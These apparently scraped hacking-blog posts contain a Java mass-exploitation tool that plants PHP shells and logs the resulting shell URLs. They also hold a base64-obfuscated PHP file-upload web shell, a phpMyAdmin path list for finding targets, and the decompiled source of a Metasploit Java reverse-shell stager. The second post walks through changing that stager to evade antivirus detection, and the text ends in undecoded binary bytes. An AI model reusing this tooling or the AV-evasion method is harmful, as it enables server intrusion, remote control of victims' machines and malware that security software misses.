//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt




eval(base64_decode("ZnVuY3Rpb24gZGlzcGxheV91cGxvYWRfZm9ybSgpDQp7DQplY2hvIDw8PERJU1BMQVlfVVBMT0FEX0ZPUk0NCg0KICAgIDxodG1sPg0KICAgIDxoZWFkPg0KICAgIDx0aXRsZT5VcGxvYWQgU2hlbGwgYnkgU2VjdXJpdHktaXMtanVzdC1hbi1pbGx1c2lvbi5ibG9nc3BvdC5kZTwvdGl0bGU+DQogICAgPHN0eWxlIHR5cGU9InRleHQvY3NzIiBtZWRpYT0ic2NyZWVuIj4NCiAgICAgICAgPCEtLQ0KICAgICAgICBodG1sIGJvZHkNCiAgICAgICAge2JhY2tncm91bmQ6IzE0RkYwMDsgZm9udDogNzYlLzEuNWVtIGFyaWFsLCBoZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGNvbG9yOiNGRjAwMzA7fQ0KICAgICAgIDxib2R5IGJnY29sb3IgPSAiYmxhY2siPg0KICAgICAgICBpbnB1dA0KICAgICAgICB7Y29sb3I6I0ZGMDAzMDt9DQogICAgICAgIC0tPg0KICAgIDwvc3R5bGU+DQogICAgPC9oZWFkPg0KICAgIA0KICAgIDxib2R5Pg0KDQogICAgPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249InskX1NFUlZFUlsnUEhQX1NFTEYnXX0iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPg0KICAgIA0KICAgIDxwPkZpbGUgVXBsb2FkIGJ5ICAgKmNyNHNoeXkqICAgZnJvbSA8YSBocmVmPSJodHRwOi8vd3d3LlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGUiPlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGU8L2E+IDxiciAvPg0KICAgIDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJteWZpbGUiIHRhYmluZGV4PSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQgRmlsZSIgdGFiaW5kZXg9IjIiIC8+DQoNCiAgICA8L2Zvcm0+DQoNCiAgICA8L2JvZHk+DQogICAgPC9odG1sPg0KDQpESVNQTEFZX1VQTE9BRF9GT1JNOw0KDQp9DQoNCi8vIEZpbGUgVXBsb2FkICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCg0KZnVuY3Rpb24gZXhlY3V0ZV91cGxvYWQoKQ0Kew0KDQogICAgLy8gcm9vdCBwYXRoDQogICAgJHBhdGggPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOw0KDQogICAgLy8gdXBsb2FkIGRpcmVjdG9yeS4gcGF0aCB3aWxsIG9yaWdpbmF0ZSBmcm9tIHJvb3QuDQogICAgJGRpcm5hbWUgPSAnLyc7DQoNCiAgICAvLyBwZXJtaXNzaW9uIHNldHRpbmdzIGZvciBuZXdseSBjcmVhdGVkIGZvbGRlcnMNCiAgICAkY2htb2QgPSAwNzU1Ow0KDQogICAgLy8gY3JlYXRlIGZpbGUgdmFycyB0byBtYWtlIHRoaW5ncyBlYXNpZXIgdG8gcmVhZC4NCiAgICAkZmlsZW5hbWUgPSAkX0ZJTEVTWydteWZpbGUnXVsnbmFtZSddOw0KICAgICRmaWxlc2l6ZSA9ICRfRklMRVNbJ215ZmlsZSddWydzaXplJ107DQogICAgJGZpbGV0eXBlID0gJF9GSUxFU1snbXlmaWxlJ11bJ3R5cGUnXTsNCiAgICAkZmlsZV90bXAgPSAkX0ZJTEVTWydteWZpbGUnXVsndG1wX25hbWUnXTsNCiAgICAkZmlsZV9lcnIgPSAkX0ZJTEVTWydteWZpbGUnXVsnZXJyb3InXTsNCiAgICAkZmlsZV9leHQgPSBzdHJyY2hyKCRmaWxlbmFtZSwgJy4nKTsNCg0KICAgIC8vIGNoZWNrIGlmIHVzZXIgYWN0dWFsbHkgcHV0IHNvbWV0aGluZyBpbiB0aGUgZmlsZSBpbnB1dCBmaWVsZC4NCiAgICBpZiAoKCRmaWxlX2VyciA9PSAwKSAmJiAoJGZpbGVzaXplICE9IDApKQ0KICAgIHsNCiAgICAgICAgLy8gQ2hlY2sgZXh0ZW5zaW9uLg0KICAgICAgICBpZiAoISRmaWxlX2V4dCkNCiAgICAgICAgew0KICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICBkaWUoJ0ZpbGUgbXVzdCBoYXZlIGFuIGV4dGVuc2lvbi4nKTsNCiAgICAgICAgfQ0KDQogICAgICAgIC8vIGV4dHJhIGNoZWNrIHRvIHByZXZlbnQgZmlsZSBhdHRhY2tzLg0KICAgICAgICBpZiAoaXNfdXBsb2FkZWRfZmlsZSgkZmlsZV90bXApKQ0KICAgICAgICB7DQogICAgICAgICAgICAvKg0KICAgICAgICAgICAgKiBjaGVjayBpZiB0aGUgZGlyZWN0b3J5IGV4aXN0cw0KICAgICAgICAgICAgKiBpZiBpdCBkb2VzbnQgZXhpc3QsIG1ha2UgdGhlIGRpcmVjdG9yeQ0KICAgICAgICAgICAgKi8NCiAgICAgICAgICAgICRkaXIgPSAkcGF0aCAuICRkaXJuYW1lOw0KDQogICAgICAgICAgICBpZiAoIWlzX2RpcigkZGlyKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkZGlyID0gZXhwbG9kZSgnLycsICRkaXJuYW1lKTsNCg0KICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRkaXIgYXMgJHN1Yl9kaXIpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAkcGF0aCAuPSAnLycgLiAkc3ViX2RpcjsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFpc19kaXIoJHBhdGgpKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICBpZiAoIW1rZGlyKCRwYXRoLCAkY2htb2QpKQ0KICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRpZSgnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gRGlyZWN0b3J5IGRvZXMgbm90IGV4aXN0IGFuZCB3YXMgdW5hYmxlIHRvIGJlIGNyZWF0ZWQuJyk7DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQoNCiAgICAgICAgICAgIC8qDQogICAgICAgICAgICAqIGNvcHkgdGhlIGZpbGUgZnJvbSB0aGUgdGVtcG9yYXJ5IHVwbG9hZCBkaXJlY3RvcnkNCiAgICAgICAgICAgICogdG8gaXRzIGZpbmFsIGRldGluYXRpb24uDQogICAgICAgICAgICAqLw0KICAgICAgICAgICAgaWYgKEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVfdG1wLCAkZGlyIC4gJy8nIC4gJGZpbGVuYW1lKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAvLyBzdWNjZXNzIQ0KICAgICAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgICAgIDxwPlN1Y2Nlc3MhPC9wPg0KICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+VmlldyBGaWxlOjwvc3Ryb25nPiA8YSBocmVmPSBcIi8kZmlsZW5hbWVcIj4kZmlsZW5hbWU8L2E+PC9wPg0KICAgICAgICAgICAgICAgICI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgLy8gZXJyb3IgbW92aW5nIGZpbGUuIGNoZWNrIGZpbGUgcGVybWlzc2lvbnMuDQogICAgICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICAgICAgZWNobyAnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gVW5hYmxlIHRvIG1vdmUgZmlsZSB0byBkZXNpZ25hdGVkIGRpcmVjdG9yeS4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIGVsc2UNCiAgICAgICAgew0KICAgICAgICAgICAgLy8gZmlsZSBzZWVtcyBzdXNwaWNpb3VzLi4uIGRlbGV0ZSBmaWxlIGFuZCBlcnJvciBvdXQuDQogICAgICAgICAgICB1bmxpbmsoJGZpbGVfdG1wKTsNCiAgICAgICAgICAgIGVjaG8gJzxzdHJvbmc+RXJyb3I6PC9zdHJvbmc+IEZpbGUgZG9lcyBub3QgYXBwZWFyIHRvIGJlIGEgdmFsaWQgdXBsb2FkLiBDb3VsZCBiZSBhIGZpbGUgYXR0YWNrLic7DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZQ0KICAgIHsNCiAgICAgICAgLy8gS2lsbCB0ZW1wIGZpbGUsIGlmIGFueSwgYW5kIGRpc3BsYXkgZXJyb3IuDQogICAgICAgIGlmICgkZmlsZV90bXAgIT0gJycpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICB9DQoNCiAgICAgICAgc3dpdGNoICgkZmlsZV9lcnIpDQogICAgICAgIHsNCiAgICAgICAgICAgIGNhc2UgJzAnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1RoYXQgaXMgbm90IGEgdmFsaWQgZmlsZS4gMCBieXRlIGxlbmd0aC4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcxJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUsIGF0ICcgLiAkZmlsZXNpemUgLiAnIGJ5dGVzLCBleGNlZWRzIHRoZSBtYXhpbXVtIGFsbG93ZWQgZmlsZSBzaXplIGFzIHNldCBpbiA8ZW0+cGhwLmluaTwvZW0+LiAnLg0KICAgICAgICAgICAgICAgICdQbGVhc2UgY29udGFjdCB5b3VyIHN5c3RlbSBhZG1pbi4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcyJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUgZXhjZWVkcyB0aGUgbWF4aW11bSBmaWxlIHNpemUgc3BlY2lmaWVkIGluIHlvdXIgSFRNTCBmb3JtLic7DQogICAgICAgICAgICAgICAgYnJlYWs7DQoNCiAgICAgICAgICAgIGNhc2UgJzMnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ0ZpbGUgd2FzIG9ubHkgcGFydGlhbGx5IHVwbG9hZGVkLiBUaGlzIGNvdWxkIGJlIHRoZSByZXN1bHQgb2YgeW91ciBjb25uZWN0aW9uICcuDQogICAgICAgICAgICAgICAgJ2JlaW5nIGRyb3BwZWQgaW4gdGhlIG1pZGRsZSBvZiB0aGUgdXBsb2FkLic7DQoNCiAgICAgICAgICAgIGNhc2UgJzQnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1lvdSBkaWQgbm90IHVwbG9hZCBhbnl0aGluZy4uLiBQbGVhc2UgZ28gYmFjayBhbmQgc2VsZWN0IGEgZmlsZSB0byB1cGxvYWQuJzsNCiAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgfQ0KICAgIH0NCn0NCg0KLy8gTG9naWMgQ29kZSAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KDQppZiAoaXNzZXQoJF9QT1NUWydleGVjdXRlJ10pKQ0Kew0KICAgIGV4ZWN1dGVfdXBsb2FkKCk7DQp9DQplbHNlDQp7DQogICAgZGlzcGxheV91cGxvYWRfZm9ybSgpOw0KfQ==")); 



dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for Personal use or study purposes.

Saturday, February 2, 2013

45 x AntiVirus Software Fail Again …. Java Reverse MetaSploit-Stager 97 % FUD

Posted by at Saturday, February 02, 2013

java-virus

 

 

Let me present you the Java Reverse MetaSploit Stager.

Here some VirusTotal Scan from the default Metasploit Payload.

metadefscan

Detection ratio:
31 / 46

File name:
evil2.jar

File type:
JAR

AntiVir
EXP/JAVA.Carbul.Gen

GData
Application.Metasploit.4441

and much more founds on this payload.Good News ….. Not Really

The Most AntiVirus use a Simple Patter to Detect Virus Malware Payloads Exploits ….

Now its time to get Dirty ?

Get some Java Decompiler and decompile the payload.jar file.

I use JD Plugin for Eclipse. Google is your best Friend.

Now we got the Java Source from the MetaSploit Stager.

package metasploit;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
import java.lang.reflect.Method;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.util.Hashtable;
import java.util.Locale;
import java.util.Properties;
import java.util.Stack;
import java.util.StringTokenizer;
import java.util.Vector;

public class Payload extends ClassLoader
{
private static final String OS_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_AIX = "aix".equals(OS_NAME);
private static final boolean IS_DOS = PATH_SEP.equals(";");
private static final String JAVA_HOME = System.getProperty("java.home");

public static void main(String[] paramArrayOfString)
throws Exception
{
Properties localProperties = new Properties();
Class localClass = Payload.class;
String str1 = localClass.getName().replace('.', '/') + ".class";
InputStream localInputStream = localClass.getResourceAsStream("/metasploit.dat");
if (localInputStream != null)
{
localProperties.load(localInputStream);
localInputStream.close();
}
String str2 = localProperties.getProperty("Executable");
File localFile2;
if (str2 != null)
{
File localFile1 = File.createTempFile("~spawn", ".tmp");
localFile1.delete();
localObject1 = new File(localFile1.getAbsolutePath() + ".dir");
((File)localObject1).mkdir();
localFile2 = new File((File)localObject1, str2);
writeEmbeddedFile(localClass, str2, localFile2);
localProperties.remove("Executable");
localProperties.put("DroppedExecutable", localFile2.getCanonicalPath());
}
int i = Integer.parseInt(localProperties.getProperty("Spawn", "0"));
Object localObject1 = localProperties.getProperty("DroppedExecutable");
Object localObject2;
Object localObject3;
Object localObject4;
Object localObject5;
Object localObject6;
int m;
if (i > 0)
{
localProperties.setProperty("Spawn", String.valueOf(i - 1));
localFile2 = File.createTempFile("~spawn", ".tmp");
localFile2.delete();
File localFile3 = new File(localFile2.getAbsolutePath() + ".dir");
localObject2 = new File(localFile3, "metasploit.dat");
localObject3 = new File(localFile3, str1);
((File)localObject3).getParentFile().mkdirs();
writeEmbeddedFile(localClass, str1, (File)localObject3);
if (localProperties.getProperty("URL", "").startsWith("https:"))
writeEmbeddedFile(localClass, "metasploit/PayloadTrustManager.class", new File(((File)localObject3).getParentFile(), "PayloadTrustManager.class"));
if (localProperties.getProperty("AESPassword", null) != null)
writeEmbeddedFile(localClass, "metasploit/AESEncryption.class", new File(((File)localObject3).getParentFile(), "AESEncryption.class"));
localObject4 = new FileOutputStream((File)localObject2);
localProperties.store((OutputStream)localObject4, "");
((FileOutputStream)localObject4).close();
localObject5 = Runtime.getRuntime().exec(new String[] { getJreExecutable("java"), "-classpath", localFile3.getAbsolutePath(), localClass.getName() });
((Process)localObject5).getInputStream().close();
((Process)localObject5).getErrorStream().close();
Thread.sleep(2000L);
localObject6 = new File[] { localObject3, ((File)localObject3).getParentFile(), localObject2, localFile3 };
for (int k = 0; k < localObject6.length; k++)
for (m = 0; (m < 10) && (!localObject6[k].delete()); m++)
{
localObject6[k].deleteOnExit();
Thread.sleep(100L);
}
}
if (localObject1 != null)
{
localFile2 = new File((String)localObject1);
if (!IS_DOS)
try
{
try
{
class$java$io$File.getMethod("setExecutable", new Class[] { Boolean.TYPE }).invoke(localFile2, new Object[] { Boolean.TRUE });
}
catch (NoSuchMethodException localNoSuchMethodException)
{
Runtime.getRuntime().exec(new String[] { "chmod", "+x", localObject1 }).waitFor();
}
}
catch (Exception localException)
{
localException.printStackTrace();
}
Runtime.getRuntime().exec(new String[] { localObject1 });
if (!IS_DOS)
{
localFile2.delete();
localFile2.getParentFile().delete();
}
}
else
{
int j = Integer.parseInt(localProperties.getProperty("LPORT", "4444"));
String str3 = localProperties.getProperty("LHOST", null);
localObject2 = localProperties.getProperty("URL", null);
if (j <= 0)
{
localObject3 = System.in;
localObject4 = System.out;
}
else if (localObject2 != null)
{
if (((String)localObject2).startsWith("raw:"))
{
localObject3 = new ByteArrayInputStream(((String)localObject2).substring(4).getBytes("ISO-8859-1"));
}
else if (((String)localObject2).startsWith("https:"))
{
localObject5 = new URL((String)localObject2).openConnection();
Class.forName("metasploit.PayloadTrustManager").getMethod("useFor", new Class[] { URLConnection.class }).invoke(null, new Object[] { localObject5 });
localObject3 = ((URLConnection)localObject5).getInputStream();
}
else
{
localObject3 = new URL((String)localObject2).openStream();
}
localObject4 = new ByteArrayOutputStream();
}
else
{
if (str3 != null)
{
localObject5 = new Socket(str3, j);
}
else
{
localObject6 = new ServerSocket(j);
localObject5 = ((ServerSocket)localObject6).accept();
((ServerSocket)localObject6).close();
}
localObject3 = ((Socket)localObject5).getInputStream();
localObject4 = ((Socket)localObject5).getOutputStream();
}
localObject5 = localProperties.getProperty("AESPassword", null);
if (localObject5 != null)
{
localObject6 = (Object[])Class.forName("metasploit.AESEncryption").getMethod("wrapStreams", new Class[] { InputStream.class, OutputStream.class, String.class }).invoke(null, new Object[] { localObject3, localObject4, localObject5 });
localObject3 = (InputStream)localObject6[0];
localObject4 = (OutputStream)localObject6[1];
}
localObject6 = new StringTokenizer("Payload -- " + localProperties.getProperty("StageParameters", ""), " ");
String[] arrayOfString = new String[((StringTokenizer)localObject6).countTokens()];
for (m = 0; m < arrayOfString.length; m++)
arrayOfString[m] = ((StringTokenizer)localObject6).nextToken();
new Payload().bootstrap((InputStream)localObject3, (OutputStream)localObject4, localProperties.getProperty("EmbeddedStage", null), arrayOfString);
}
}

private static void writeEmbeddedFile(Class paramClass, String paramString, File paramFile)
throws FileNotFoundException, IOException
{
InputStream localInputStream = paramClass.getResourceAsStream("/" + paramString);
FileOutputStream localFileOutputStream = new FileOutputStream(paramFile);
byte[] arrayOfByte = new byte[4096];
int i;
while ((i = localInputStream.read(arrayOfByte)) != -1)
localFileOutputStream.write(arrayOfByte, 0, i);
localFileOutputStream.close();
}

private final void bootstrap(InputStream paramInputStream, OutputStream paramOutputStream, String paramString, String[] paramArrayOfString)
throws Exception
{
try
{
DataInputStream localDataInputStream = new DataInputStream(paramInputStream);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
Class localClass;
if (paramString == null)
{
int i = localDataInputStream.readInt();
do
{
byte[] arrayOfByte = new byte[i];
localDataInputStream.readFully(arrayOfByte);
resolveClass(localClass = defineClass(null, arrayOfByte, 0, i, localProtectionDomain));
i = localDataInputStream.readInt();
}
while (i > 0);
}
else
{
localClass = Class.forName("javapayload.stage." + paramString);
}
Object localObject = localClass.newInstance();
localClass.getMethod("start", new Class[] { DataInputStream.class, OutputStream.class, new String[0].getClass() }).invoke(localObject, new Object[] { localDataInputStream, paramOutputStream, paramArrayOfString });
}
catch (Throwable localThrowable)
{
localThrowable.printStackTrace(new PrintStream(paramOutputStream));
}
}

private static String getJreExecutable(String paramString)
{
File localFile = null;
if (IS_AIX)
localFile = findInDir(JAVA_HOME + "/sh", paramString);
if (localFile == null)
localFile = findInDir(JAVA_HOME + "/bin", paramString);
if (localFile != null)
return localFile.getAbsolutePath();
return addExtension(paramString);
}

private static String addExtension(String paramString)
{
return paramString + (IS_DOS ? ".exe" : "");
}

private static File findInDir(String paramString1, String paramString2)
{
File localFile1 = normalize(paramString1);
File localFile2 = null;
if (localFile1.exists())
{
localFile2 = new File(localFile1, addExtension(paramString2));
if (!localFile2.exists())
localFile2 = null;
}
return localFile2;
}

private static File normalize(String paramString)
{
Stack localStack = new Stack();
String[] arrayOfString = dissect(paramString);
localStack.push(arrayOfString[0]);
StringTokenizer localStringTokenizer = new StringTokenizer(arrayOfString[1], File.separator);
while (localStringTokenizer.hasMoreTokens())
{
localObject = localStringTokenizer.nextToken();
if (!".".equals(localObject))
if ("..".equals(localObject))
{
if (localStack.size() < 2)
return new File(paramString);
localStack.pop();
}
else
{
localStack.push(localObject);
}
}
Object localObject = new StringBuffer();
for (int i = 0; i < localStack.size(); i++)
{
if (i > 1)
((StringBuffer)localObject).append(File.separatorChar);
((StringBuffer)localObject).append(localStack.elementAt(i));
}
return new File(((StringBuffer)localObject).toString());
}

private static String[] dissect(String paramString)
{
char c = File.separatorChar;
paramString = paramString.replace('/', c).replace('\\', c);
String str = null;
int i = paramString.indexOf(':');
int j;
if ((i > 0) && (IS_DOS))
{
j = i + 1;
str = paramString.substring(0, j);
char[] arrayOfChar = paramString.toCharArray();
str = str + c;
j = arrayOfChar[j] == c ? j + 1 : j;
StringBuffer localStringBuffer = new StringBuffer();
for (int k = j; k < arrayOfChar.length; k++)
if ((arrayOfChar[k] != c) || (arrayOfChar[(k - 1)] != c))
localStringBuffer.append(arrayOfChar[k]);
paramString = localStringBuffer.toString();
}
else if ((paramString.length() > 1) && (paramString.charAt(1) == c))
{
j = paramString.indexOf(c, 2);
j = paramString.indexOf(c, j + 1);
str = j > 2 ? paramString.substring(0, j + 1) : paramString;
paramString = paramString.substring(str.length());
}
else
{
str = File.separator;
paramString = paramString.substring(1);
}
return new String[] { str, paramString };
}
}


Im not a Dev i never learning java ,just a normal Guy like you with a small Brain.



But if we read the Source Code we can learn much things or use Gooolge its my best friend. Big Thanks to Google and the guys how fill it I Love you.



Now we Build a new Java Project in Eclipse Paste the Java Source code into it.



Fix the Errors Zwinkerndes Smiley



Try too Compile it and check if it works.



Now its time too change the Source code else the Antivirus Software will find your Payload.



After some long time ….. 15 mins recodingZwinkerndes Smiley



Time to test the New Payload.



armitest



Start Armitage Open a Java Meterpreter Reverse Tcp start listen on your Port.



After some time My New Metasploit Payload Works with small changes Zwinkerndes Smiley



But is it now FUD ? Lets test it Again on VirusTotal.



 fudmetatest



Detection ratio:


1 / 46



File name:

Gameload.class



File type:

Java Bytecode



AntiVir EXP/JAVA.Loader.Gen



97 % FUD i tested much things to get it 100 % FUD but atm i cant finde Antivir Patter Zwinkerndes Smiley Good WOrk .. shame on me ……



Now you can compile the Java Code to a Jar or Compile the Class into a Exe file.Read the other Post How too do it.



We got the Same Results


Detection ratio:


1 / 46

I split the exe file and found the AntiVir Patter



Hex to Txt
s.RÛNÛ@.=K..×MH€@/.B)$…ÖR_SUª •.Üò..ž7Î(ÙÈØÈ^B?‡_à...}¬..Uuv“^¤‚ZYžÙ..9çÌìÞ~¿þŠ.^aÓÁ”Àz˜.ù)õéK$»þð.ùíãHfƒ.(Éh?>Tq/9u..˜.Ê‘ô#.÷ýýî.Bí (°b£òTû4¢Xûï..>˜E 2M1¥.Å·*Vú.@®Ñì.äw’.¹¬à...Ó.å@Åôùä¨Ké.ìF$P.’PF.™*³Ÿ.óz 2..à..·.ÖêÙUÙ±Ôá€z.µFðKìO™.fÇÅ...Ì.Tþ:öPâ@¡Ozo×v°çâ.ž8x,°|.’v˜.Å.žb™epéŸa.z£y_.ã”–¡Xñ°j¦S.M_LM#-0wG.<áÌVóeü.XÀm''iH.•.éÒ.“{m.P.3ò_.0Åž/Ší.ï|ö‚}áå%Üs{ì±-Úà..²õÆ.(¡Ìž..*“bâì.ûÅ..T+¸9Cù.KŸ¶¿ÁÙ¾À³ßp5ËìÁeÀ..U†ª±5ð«cˆ.¼YÕ±Æ.%Öø.ëVï.‹´ñ.PK..........ë.AB‹¨%ª·...-..

Hex
